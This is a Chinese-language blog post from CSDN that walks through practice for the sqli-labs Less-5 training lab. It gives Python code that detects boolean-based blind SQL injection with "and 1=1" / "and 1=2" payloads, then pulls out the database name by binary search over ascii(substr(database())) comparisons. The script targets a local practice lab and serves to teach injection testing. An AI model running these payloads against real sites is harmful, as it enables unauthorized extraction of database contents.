poc练习-sqli-labs less5

最新推荐文章于 2024-08-23 16:53:34 发布
最新推荐文章于 2024-08-23 16:53:34 发布
阅读量122 收藏
点赞数
分类专栏: poc 文章标签: python 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44248518/article/details/129199992
版权

sql盲注poc和exp,针对sqli-labs靶场的less5

poc检测是否存在sql盲注,exp获得数据库长度和库名,获得表名和字段名同理,只不过payload不一样,就不继续写了,exp中使用了二分查找能更快爆出库名
知识点:
线性查找(顺序查找)时间复杂度:N
二分查找时间复杂度:log(N)

'''
bool盲注:http://127.0.0.1/sqli-labs/Less-5/
判断是否存在基于bool的sql injection(blind)
poc编写:输出结果有或者没有
exp列出库名
'''
import requests
from time_decorator import time_wrapper   # 函数运行计时装饰器  可忽略


# 判断是否有bool盲注
def verify(url):
    payload1 = "?id=1' and 1=1 --+"
    payload2 = "?id=1' and 1=2 --+"
    resp1 = requests.get(url + payload1)
    resp2 = requests.get(url + payload2)

    text1 = resp1.text
    text2 = resp2.text
    if ('You are in' in text1) and ('You are in' not in text2):
        print(url, ':存在单引号闭合的sql注入(盲注)')
    else:
        print(url, ':不存在单引号闭合的sql注入(盲注)')


# 获得数据库长度
def get_dblength(url):
    for i in range(1, 20):
        payload = "?id=1' and length(database())={i} --+".format(i=i)
        res = requests.get(url + payload)
        if "You are in" in res.text:
            return i


# 获得数据库名,线性查找有点慢,需要6 7秒左右
# @time_wrapper
# def get_dbname(url, dblength):
#     dblist = []
#     dbstr = ""
#     for i in range(dblength):
#         for j in range(48, 122):
#             payload = "?id=1' and ascii(substr(database(),{i},1))={j} --+".format(i=i + 1, j=j)
#             res = requests.get(url + payload)
#             if "You are in" in res.text:
#                 dblist.append(j)
#                 break
#     for item in dblist:
#         dbstr += chr(item)
#     return dbstr


# 获得数据库名,二分查找更快,不到一秒
@time_wrapper
def get_dbname(url, dblength):
    dblist = []
    dbstr = ""
    for i in range(dblength):
        left = 48
        right = 122
        while True:
            mid = (left + right) // 2
            payload = "?id=1' and ascii(substr(database(),{i},1))>{mid} --+".format(i=i + 1, mid=mid)
            payload_mid = "?id=1' and ascii(substr(database(),{i},1))={mid} --+".format(i=i + 1, mid=mid)
            res = requests.get(url + payload)
            res_mid = requests.get(url + payload_mid)
            if "You are in" in res_mid.text:
                dblist.append(mid)
                break
            elif "You are in" in res.text:
                left = mid + 1
            elif "You are in" not in res.text:
                right = mid - 1
            # 防止while死循环
            elif right < left:
                break
    for item in dblist:
        dbstr += chr(item)
    return dbstr


if __name__ == '__main__':
    url = 'http://127.0.0.1/sqli-labs/Less-5/'
    verify(url)
    dblength = get_dblength(url)
    dbname = get_dbname(url, dblength)
    print(dbname)

函数计时装饰器

import time

# 一个函数装饰器 用于统计函数运行时间
def time_wrapper(fun):
    def time_count(*args, **kwargs):
        before_time = time.time()
        ret = fun(*args, **kwargs)
        current_time = time.time()
        print(f'函数运行总共用时:{current_time - before_time}秒')
        return ret

    return time_count
kuangfreedom
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql poc_你的PoC和EXP可能得改改了
weixin_33255691的博客
01-19 344
一、前言在MySQL 5.7.5之前的所有主版本存在一个BUG,该可能导致影响POC/EXP需要重新编写或修正的问题。BUG信息链接:二、问题说明在BUG说明中,可以通过以下SQL语句复现:set names latin1;drop table if exists t1;create table t1(a int) engine=myisam;insert into t1 values (0),(...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
一个简单sql注入的poc
weixin_30279315的博客
12-13 566
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python来实现。 i...
如何编写POC/EXP
weixin_45626840的博客
01-10 3123
理解并编写POC/EXP
pythonpoc编写——sql
qq_51796436的博客
03-02 6639
sql注入漏洞漏扫单个网站基础sql扫描多个网站sql基础扫描 poc:即验证漏洞是否存在的脚本,也就是扫描器 兄弟们,开始写扫描器啦 sql注入漏洞漏扫 单个网站基础sql扫描 第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入
POC是何物?
热门推荐
yellow的博客
06-17 2万+
Intel和AMD的cpu曝出漏洞,领导让我找到poc验证,并想出解决办法,用到我们自己的安全产品上面。 当时不明白poc为何物? 后来在微信公众号上看到一篇关于cpu漏洞的文章(附poc),打开链接是github上的一个项目。 知乎上有人给出poc的解释: 就想当初不知道0day是什么意思一样。
poc练习-sqli-labs less11
qq_44248518的博客
02-24 47
poc练习-sqli-labs less11
Sqli-labs之Less-34
→_→
05-02 2276
Less-34 基于错误_POST_单引号_字符型_addslashes()_宽字节注入 《注入天书》中介绍因 POST 不能进行 URLencode,可使用 UTF-8 转 UTF-16 或 UTF-32,实践中发现正常的宽字节注入仍有效,猜测是编码的问题,待解决。 一个参考:...
SQLi LABS Less-29 联合注入
wangyuxiang946的博客
08-16 1万+
salilabs29,SQLi-LABS第29关使用GET请求提交参数,在url中构造payload即可
sqli-labs (less-37)
kukudeshuo的博客
03-14 360
sqli-labs (less-37) 进入37关,输入用户名和密码 利用hackbar抓取POST内容 uname=admin'&passwd=admin&submit=Submit uname=admin&passwd=admin'&submit=Submit 用户名和密码的位置单引号都被转义 直接查看源代码查看是否为GBK编码 确实使用了GBK编码,在单引号前面加入%df让单引号成功逃逸 确定回显位置 uname=a%df' union select 1,2
Magento-Shoplift-SQLI:Shoplift代码的概念证明代码
05-09
Magento-Shoplift-SQLI Shoplift代码的概念证明代码 这是代码在非常流行的网上商店CMS Magento中利用了一些相当大的缺陷。 我没有发现该漏洞,所有功劳归Checkpoint所有。 您可以在此处阅读其技术公开披露: ...
poc-route-autoload
04-29
标题“poc-route-autoload”涉及的是一个关于路由自动加载的Proof of Concept(概念验证)项目,主要在Node.js环境中实现。在这个项目中,我们关注的是如何高效地管理和动态加载应用中的路由,以便于构建RESTful API...
poc-swagger:[POC]昂首阔步
05-09
标题中的“poc-swagger:[POC]昂首阔步”可能是指一个Proof of Concept(PoC)项目,专门针对Swagger进行的安全测试或漏洞利用。Swagger是一个流行的API开发和文档工具,它允许开发者通过OpenAPI Specification(OAS...
POC bomber -资源
11-19
POC bomber 的poc支持weblogic,tomcat,...POC bomber默认使用验证模式进行poc的验证,如返回结果中attack的值为True时,可以加参数(--attack)进入攻击模式直接调用exp进行攻击(需要指定poc文件名),达到一键getshell
如何在Python中使用IP代理
最新发布
IPIPGO的博客
08-23 351
通过以上步骤,你应该已经学会了如何在Python中使用IP代理。无论是单个代理IP、带认证的代理IP,还是批量使用代理IP,这些方法都能帮助你在实际项目中灵活应用。希望这篇文章对你有所帮助,如果你有任何问题或建议,欢迎在评论区留言,我们会尽力为你解答。t=N7T8。
常见面试问题(Python)
jiao_mrswang的博客
08-23 120
5、GIL全局解释锁。
零基础学习人工智能—Python—Pytorch学习(六)
kiba518的博客
08-21 846
前言 本文主要讲神经网络的上半部分。 这篇文章开始有很多公式了,这些公式都很简单,但是如果是不经常在脑海里思考公式的人,那可能需要多花点时间做一下自我训练,个人感觉,也就几天时间,就能把自己感觉给调整出来。 习惯了公式看下面内容就会轻松很多,另外如果要深入学习人工智能,熟练的认知公式也是个必须的事情。 另外,我发现我前面文章写的有歧义的地方还是挺多,虽然,已经改了一部分,但,可能还有没发现的,大...
2024.8.20 Python,链表,二叉树
RaidenMessi的博客
08-20 409
代码逻辑:第一层,对l1.val进行判断,谁小听谁的,目标是输出这个链表,那就要修改这个链表,在第一层的时候,是先进函数,再赋值,所以在第一层的时候还没进行赋值就已经进第二层了,在第二层的时候还没赋值就又进第三层了,以此类推,然后每一次都抛掉一个最小的数。可能之后就理解了吧。我想了下,我决定不管了,就跟二分法当时一样,我直接按逻辑走,谁小谁就去用他的next继续和他刚才的人比,同时输出他自己本身,完事了。链表是线性表,是一维的,保存了现在这个数的值和下一个数的地址,分为表元素域,下一结点链接域,
poc-yaml-go-pprof-leak
09-11
根据引用和引用的信息,poc-yaml-go-pprof-leak是一个与pprof定位问题相关的内容。pprof是一个用于性能分析和故障排查的工具,它可以帮助我们定位代码中的问题。通过使用pprof,我们可以获取代码的性能剖析数据,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值